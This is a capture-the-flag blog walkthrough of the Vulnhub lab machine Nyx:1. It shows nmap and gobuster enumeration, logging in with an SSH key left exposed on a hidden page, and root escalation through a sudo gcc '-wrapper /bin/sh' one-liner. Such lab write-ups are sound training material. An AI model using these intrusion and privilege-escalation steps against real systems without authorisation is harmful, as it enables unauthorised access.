Sign in Subscribe
Vulnhub

Nyx 1 Vulnhub Walkthrough

Nyx:1 is a boot2root machine from Vulnhub. This machine is rated easy and good for those who are just starting with Vulnhub CTFs.

Madhav Mehndiratta

3 min read
Nyx 1 Vulnhub Walkthrough

Enumeration and Initial Shell

As usual, I started with nmap to look for open ports and default services.

┌──(madhav㉿kali)-[~/Documents/vulnhub/nyx]
└─$ nmap -sC -sV -oN nmap/initial 192.168.1.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-23 13:08 IST
Nmap scan report for 192.168.1.3
Host is up (0.0021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fc:8b:87:f4:36:cd:7d:0f:d8:f3:16:15:a9:47:f1:0b (RSA)
|   256 b4:5c:08:96:02:c6:a8:0b:01:fd:49:68:dd:aa:fb:3a (ECDSA)
|_  256 cb:bf:22:93:69:76:60:a4:7d:c0:19:f3:c7:15:e7:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: nyx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.18 seconds

We can see port 80 and 22 open. Let's open our browser and check port 80 first.

Next, I performed a gobuster scan to look for hidden files and directories.

┌──(madhav㉿kali)-[~/Documents/vulnhub/nyx]
└─$ gobuster dir -u http://192.168.1.3 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.3
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,html
[+] Timeout:        10s
===============================================================
2020/09/23 13:09:00 Starting gobuster
===============================================================
/index.html (Status: 200)
/key.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/09/23 13:12:53 Finished
===============================================================

We can see a page named key.php, After opening it in our browser, I saw that it asks us for a key.

Looking at the source code of the page, I found that this form is not submitting the value anywhere, So basically it was a rabbit hole. Next, I ran the http-enum script in Nmap.

┌──(madhav㉿kali)-[~/Documents/vulnhub/nyx]
└─$ nmap -sC -sV -p 80 --script=http-enum 192.168.1.3  
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-23 13:13 IST
Nmap scan report for 192.168.1.3
Host is up (0.00032s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-enum: 
|_  /d41d8cd98f00b204e9800998ecf8427e.php: Seagate BlackArmorNAS 110/220/440 Administrator Password Reset Vulnerability
|_http-server-header: Apache/2.4.38 (Debian)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.16 seconds

Here it reveals another page, I opened this in the browser and found a SSH key.

Looking at the title of this page, we can find a username mpampis. I copied this key and saved it into a file and logged in via ssh after giving the correct permissions. After logging in, we can read our user flag.

nano id_rsa
chmod 600 id_rsa
ssh -i id_rsa mpampis@192.168.1.3
`

Privilege Escalation

For obtaining the root shell, I used the sudo -l command to see if this user can run any commands as root.

mpampis@nyx:/$ sudo -l
Matching Defaults entries for mpampis on nyx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mpampis may run the following commands on nyx:
    (root) NOPASSWD: /usr/bin/gcc

We can run gcc as root. I searched for this in GTFO Bins and found that we can get a root shell using this simple command:

sudo gcc -wrapper /bin/sh,-s .

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Evgeny Polukhin.